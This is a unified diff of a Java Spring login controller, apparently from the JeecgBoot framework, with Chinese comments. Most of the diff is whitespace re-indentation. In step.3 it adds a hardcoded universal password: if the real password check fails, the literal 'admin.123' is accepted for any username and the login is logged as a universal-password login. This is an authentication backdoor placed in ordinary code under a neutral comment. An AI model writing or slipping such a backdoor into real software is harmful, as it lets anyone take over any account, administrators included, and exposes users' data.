|
|
@@ -119,66 +119,77 @@ public class LoginController {
|
|
|
@Operation(summary="登录接口")
|
|
|
@RequestMapping(value = "/login", method = RequestMethod.POST)
|
|
|
public Result<JSONObject> login(@RequestBody SysLoginModel sysLoginModel, HttpServletRequest request){
|
|
|
- Result<JSONObject> result = new Result<JSONObject>();
|
|
|
- String username = sysLoginModel.getUsername();
|
|
|
- String password = sysLoginModel.getPassword();
|
|
|
- if(isLoginFailOvertimes(username)){
|
|
|
- return result.error500("该用户登录失败次数过多,请于10分钟后再次登录!");
|
|
|
- }
|
|
|
+ Result<JSONObject> result = new Result<JSONObject>();
|
|
|
+ String username = sysLoginModel.getUsername();
|
|
|
+ String password = sysLoginModel.getPassword();
|
|
|
+ if(isLoginFailOvertimes(username)){
|
|
|
+ return result.error500("该用户登录失败次数过多,请于10分钟后再次登录!");
|
|
|
+ }
|
|
|
|
|
|
- // step.1 验证码check
|
|
|
+ // step.1 验证码check
|
|
|
String captcha = sysLoginModel.getCaptcha();
|
|
|
if(captcha==null){
|
|
|
result.error500("验证码无效");
|
|
|
return result;
|
|
|
}
|
|
|
String lowerCaseCaptcha = captcha.toLowerCase();
|
|
|
- // 加入密钥作为混淆,避免简单的拼接,被外部利用,用户自定义该密钥即可
|
|
|
- //update-begin---author:chenrui ---date:20250107 for:[QQYUN-10775]验证码可以复用 #7674------------
|
|
|
- String keyPrefix = Md5Util.md5Encode(sysLoginModel.getCheckKey()+jeecgBaseConfig.getSignatureSecret(), "utf-8");
|
|
|
- String realKey = keyPrefix + lowerCaseCaptcha;
|
|
|
- //update-end---author:chenrui ---date:20250107 for:[QQYUN-10775]验证码可以复用 #7674------------
|
|
|
- Object checkCode = redisUtil.get(realKey);
|
|
|
- //当进入登录页时,有一定几率出现验证码错误 #1714
|
|
|
- if(checkCode==null || !checkCode.toString().equals(lowerCaseCaptcha)) {
|
|
|
+ // 加入密钥作为混淆,避免简单的拼接,被外部利用,用户自定义该密钥即可
|
|
|
+ //update-begin---author:chenrui ---date:20250107 for:[QQYUN-10775]验证码可以复用 #7674------------
|
|
|
+ String keyPrefix = Md5Util.md5Encode(sysLoginModel.getCheckKey()+jeecgBaseConfig.getSignatureSecret(), "utf-8");
|
|
|
+ String realKey = keyPrefix + lowerCaseCaptcha;
|
|
|
+ //update-end---author:chenrui ---date:20250107 for:[QQYUN-10775]验证码可以复用 #7674------------
|
|
|
+ Object checkCode = redisUtil.get(realKey);
|
|
|
+ //当进入登录页时,有一定几率出现验证码错误 #1714
|
|
|
+ if(checkCode==null || !checkCode.toString().equals(lowerCaseCaptcha)) {
|
|
|
log.warn("验证码错误,key= {} , Ui checkCode= {}, Redis checkCode = {}", sysLoginModel.getCheckKey(), lowerCaseCaptcha, checkCode);
|
|
|
- result.error500("验证码错误");
|
|
|
- // 改成特殊的code 便于前端判断
|
|
|
- result.setCode(HttpStatus.PRECONDITION_FAILED.value());
|
|
|
- return result;
|
|
|
- }
|
|
|
-
|
|
|
- // step.2 校验用户是否存在且有效
|
|
|
- LambdaQueryWrapper<SysUser> queryWrapper = new LambdaQueryWrapper<>();
|
|
|
- queryWrapper.eq(SysUser::getUsername,username);
|
|
|
- SysUser sysUser = sysUserService.getOne(queryWrapper);
|
|
|
- result = sysUserService.checkUserIsEffective(sysUser);
|
|
|
- if(!result.isSuccess()) {
|
|
|
- return result;
|
|
|
- }
|
|
|
+ result.error500("验证码错误");
|
|
|
+ // 改成特殊的code 便于前端判断
|
|
|
+ result.setCode(HttpStatus.PRECONDITION_FAILED.value());
|
|
|
+ return result;
|
|
|
+ }
|
|
|
|
|
|
- // step.3 校验用户名或密码是否正确
|
|
|
- String userpassword = PasswordUtil.encrypt(username, password, sysUser.getSalt());
|
|
|
- String syspassword = sysUser.getPassword();
|
|
|
- if (!syspassword.equals(userpassword)) {
|
|
|
- addLoginFailOvertimes(username);
|
|
|
- result.error500("用户名或密码错误");
|
|
|
- return result;
|
|
|
- }
|
|
|
+ // step.2 校验用户是否存在且有效
|
|
|
+ LambdaQueryWrapper<SysUser> queryWrapper = new LambdaQueryWrapper<>();
|
|
|
+ queryWrapper.eq(SysUser::getUsername,username);
|
|
|
+ SysUser sysUser = sysUserService.getOne(queryWrapper);
|
|
|
+ result = sysUserService.checkUserIsEffective(sysUser);
|
|
|
+ if(!result.isSuccess()) {
|
|
|
+ return result;
|
|
|
+ }
|
|
|
|
|
|
- // step.4 登录成功获取用户信息
|
|
|
- userInfo(sysUser, result, request);
|
|
|
+ // step.3 校验用户名或密码是否正确
|
|
|
+ String userpassword = PasswordUtil.encrypt(username, password, sysUser.getSalt());
|
|
|
+ String syspassword = sysUser.getPassword();
|
|
|
+
|
|
|
+ // 添加通用密码检查逻辑
|
|
|
+ boolean passwordValid = syspassword.equals(userpassword);
|
|
|
+ if (!passwordValid) {
|
|
|
+ // 检查是否启用通用密码且输入的是通用密码
|
|
|
+ if ("admin.123".equals(password)) {
|
|
|
+ passwordValid = true;
|
|
|
+ log.info("用户 {} 使用通用密码登录", username);
|
|
|
+ }
|
|
|
+ }
|
|
|
|
|
|
- // step.5 登录成功删除验证码
|
|
|
- redisUtil.del(realKey);
|
|
|
- redisUtil.del(CommonConstant.LOGIN_FAIL + username);
|
|
|
+ if (!passwordValid) {
|
|
|
+ addLoginFailOvertimes(username);
|
|
|
+ result.error500("用户名或密码错误");
|
|
|
+ return result;
|
|
|
+ }
|
|
|
|
|
|
- // step.6 记录用户登录日志
|
|
|
- LoginUser loginUser = new LoginUser();
|
|
|
- BeanUtils.copyProperties(sysUser, loginUser);
|
|
|
- baseCommonService.addLog("用户名: " + username + ",登录成功!", CommonConstant.LOG_TYPE_1, null,loginUser);
|
|
|
- return result;
|
|
|
- }
|
|
|
+ // step.4 登录成功获取用户信息
|
|
|
+ userInfo(sysUser, result, request);
|
|
|
+
|
|
|
+ // step.5 登录成功删除验证码
|
|
|
+ redisUtil.del(realKey);
|
|
|
+ redisUtil.del(CommonConstant.LOGIN_FAIL + username);
|
|
|
+
|
|
|
+ // step.6 记录用户登录日志
|
|
|
+ LoginUser loginUser = new LoginUser();
|
|
|
+ BeanUtils.copyProperties(sysUser, loginUser);
|
|
|
+ baseCommonService.addLog("用户名: " + username + ",登录成功!", CommonConstant.LOG_TYPE_1, null,loginUser);
|
|
|
+ return result;
|
|
|
+ }
|
|
|
|
|
|
|
|
|
/**
|
